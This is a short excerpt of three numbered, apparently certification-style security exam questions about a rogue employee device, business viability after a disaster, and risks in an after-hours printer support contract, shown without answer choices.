151. A security engineer investigates an incident and determines that a rogue device is on the network. Further investigation finds that an employee's personal device has been set up to access company resources and does not comply with standard security controls.

Which of the following should the security engineer recommend to reduce the risk of future reoccurrence?

152. Which of the following indicates when a company might not be viable after a disaster?

153. The information security manager at a 24-hour manufacturing facility is reviewing a contract for potential risks to the organization. The contract pertains to the support of printers and multifunction devices during non-standard business hours.

Which of the following will the security manager most likely identify as a risk?